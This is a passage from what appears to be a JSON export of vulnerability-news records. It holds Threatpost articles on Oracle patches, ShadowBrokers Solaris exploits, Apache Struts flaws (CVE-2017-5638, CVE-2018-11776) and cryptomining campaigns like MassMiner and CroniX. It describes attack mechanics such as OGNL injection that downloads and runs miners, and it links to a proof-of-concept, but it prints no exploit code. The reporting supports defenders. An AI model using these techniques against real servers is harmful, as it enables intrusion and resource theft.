under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-23T05:28:33", "description": "Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.\n\nThe Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, [earlier this month](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\nScores of Oracle products, roughly two dozen in total, are affected by the vulnerability. Multiple versions of Oracle\u2019s Financial Services product, in addition to its FLEXCUBE Private Banking product, and WebLogic Server, are included in the advisory. A full list of Oracle products and versions affected by the vulnerability can be found [here](<http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html>).\n\nOracle also pushed fixes for six other vulnerabilities on Friday, including CVE-2017-7672, CVE-2017-9787, CVE-2017-9791, CVE-2017-9793, CVE-2017-9804, and CVE-2017-12611.\n\nThe United States Computer Emergency Readiness Team (US-CERT) issued an alert around the updates on Monday.\n\n> Oracle Patches Apache Vulnerabilities <https://t.co/rGy95kxj2E>\n> \n> \u2014 US-CERT (@USCERT_gov) [September 25, 2017](<https://twitter.com/USCERT_gov/status/912297399564910594>)\n\nOracle used the advisory as an opportunity to remind users that it fixed CVE-2017-5638, the Struts vulnerability behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), back in April with its [quarterly Critical Patch Update](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>). The company said the April update should have already been applied to customer systems and encouraged admins to apply the fixes in this month\u2019s advisory without delay.\n\nEquifax meanwhile continues to grapple with the fallout surrounding the breach that allowed an attacker to siphon names, Social Security numbers, birth dates, addresses, and other information from its servers [this past summer](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nThe credit bureau\u2019s chairman and chief executive Richard Smith retired [on Tuesday](<https://www.equifaxsecurity2017.com/2017/09/26/equifax-chairman-ceo-richard-smith-retires/>) in wake of the breach. In his stead the company said Paulino do Rego Barros Jr., who previously served as president of the company\u2019s Asia-Pacific division, will assume the role of interim chief executive.\n\nPrior to announcing the news, trading of Equifax shares was halted Tuesday morning.\n\nThe CEO will forgo his 2017 bonus according to [a copy of the retirement agreement](<https://www.sec.gov/Archives/edgar/data/33185/000119312517293765/d420554dex101.htm>) between Equifax and Smith posted to the Securities and Exchange Commission. According to the filing Smith will stay on in an unpaid advisory role for at least 90 days. The company says it will defer decisions relating to Smith\u2019s benefits until its Board of Directors completes their independent review of the breach.\n\n\u201cThe cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right. At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward,\u201d Smith said in a statement Tuesday.\n\n\u201cOur interim CEO, Paulino, is an experienced leader with deep knowledge of our company and the industry. The Board of Directors has absolute confidence in his ability to guide the company through this transition,\u201d Mark Feidler, the Board\u2019s non-executive chairman, said.\n\nSmith\u2019s departure comes [a week after the company](<Smith's%20departure%20comes%20a%20week%20after%20the%20company%20announced%20its%20chief%20information%20officer%20David%20Webb%20and%20chief%20security%20officer%20Susan%20Mauldin,%20would%20be%20retiring.>) announced its chief information officer David Webb and chief security officer Susan Mauldin, would also be retiring.\n\nDespite retiring, according to reports Smith is still on track to testify before the Senate Banking Committee next week, on Oct. 4.\n\nSmith will likely get an earful from senators next week, including Mark Warner (D-VA). On Tuesday in a hearing with Securities and Exchange Commission (SEC) Chairman Jay Clayton, Warner called out Equifax, calling the company a \u201ctravesty.\u201d\n\n\u201cWe have no ability to opt-in to these systems. We are part of these systems whether we like it or not. I\u2019m often asked in my job on the Intelligence Committee what I think the single greatest vulnerability our country faces is, and I believe it\u2019s cybersecurity.\u201d Warner said.\n\n\u201cI think Equifax is a travesty. I think the resignation of the CEO is by no means enough\u2026 Number one, in terms of the sloppiness of their defenses. Two, in terms of the fact that this was clearly a knowable vulnerability \u2013 they had known for months, and if they had simply put a patch in place we might have precluded this\u2026 I question whether Equifax has the right to even continue providing these services with the level of sloppiness and lack of attention to cybersecurity.\u201d\n", "cvss3": {}, "published": "2017-09-26T14:28:26", "type": "threatpost", "title": "Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7672", "CVE-2017-9787", "CVE-2017-9791", "CVE-2017-9793", "CVE-2017-9804", "CVE-2017-9805"], "modified": "2017-09-26T14:28:26", "id": "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "href": "https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-10-30T07:20:19", "description": "The Apache Software Foundation warned in an advisory that the latest version of the Commons FileUpload library is susceptible to a two-year-old remote code execution flaw. Users of the vulnerable library must update their projects manually.\n\nThe critical bug in Commons FileUpload library is a known vulnerability ([CVE-2016-1000031](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>)) that enables remote code execution in the open-source framework, which facilitates developing web applications in the Java programming language.\n\nEssentially a Java Object exists in the Apache Commons FileUpload library that can be manipulated so that when it is deserialized, it can write or copy files to disk in arbitrary locations.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d according to the Monday [advisory](<http://mail-archives.us.apache.org/mod_mbox/www-announce/201811.mbox/%3CCAMopvkMo8WiP%3DfqVQuZ1Fyx%3D6CGz0Epzfe0gG5XAqP1wdJCoBQ%40mail.gmail.com%3E>). \u201cYour project is affected if it uses the built-in file upload mechanism of Struts 2, which defaults to the use of commons-fileupload. The updated commons-fileupload library is a drop-in replacement for the vulnerable version. Deployed applications can be hardened by replacing the commons-fileupload jar file in WEB-INF/lib with the fixed jar.\u201d\n\nThe vulnerable commons-fileupload library is used in Apache Struts versions 2.3.36 and prior, the Foundation said in a Monday advisory. They urged users to upgrade to the latest released version of Commons FileUpload library \u2013 which is 1.3.3.\n\nThe vulnerability is reminiscent of [CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>), another critical remote code execution Apache vulnerability behind the massive 2017 Equifax breach that led to the compromise of 143 million Americans\u2019 data.\n\nWhile that Apache Struts vulnerability (impacting the Jakarta based file upload Multipart parser) was patched back in March 2017, the consumer credit reporting agency didn\u2019t apply patches for two months after the flaw\u2019s disclosure \u2013 eventually leading to the groundbreaking breach.\n\nSimilarly, this latest deserialization vulnerability was disclosed and patched in commons-fileupload in [March,](<https://issues.apache.org/jira/browse/FILEUPLOAD-279>) but since then a new version of Struts that became available \u2013 the 2.3.36 version, which was released in October \u2013 has touted vulnerable versions of the library.\n\nStruts versions from 2.5.12 are not affected, as this newer version of Struts includes a patched commons-fileupload component.\n\nUsers can fix the risk by replacing the faulty library manually.\n\n\u201cThere is no simple \u2018new Struts version\u2019 to fix this,\u201d said Johannes Ullrich, dean of research at the SANS Institute, in a blog [post](<https://isc.sans.edu/diary/rss/24278>) on Monday. \u201cYou will have to swap out the commons-fileupload library manually.\u201d\n\n\u201cAnd while you are at it: Double check that you don\u2019t have any other copies of the vulnerable library sitting on your systems,\u201d he added. \u201cStruts isn\u2019t the only one using it, and others may have neglected to update it as well.\u201d\n\nIt is only the latest security issue to afflict Apache Struts \u2013 earlier in August for instance, a critical remote code-execution vulnerability in Apache Struts 2 was [disclosed](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>).\n", "cvss3": {}, "published": "2018-11-06T12:27:15", "type": "threatpost", "title": "Apache Struts Warns Users of Two-Year-Old Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1000031", "CVE-2017-5638", "CVE-2019-11043"], "modified": "2018-11-06T12:27:15", "id": "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "href": "https://threatpost.com/apache-struts-warns-users-of-two-year-old-vulnerability/138820/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "cvss3": {}, "published": "2018-05-03T20:26:37", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that 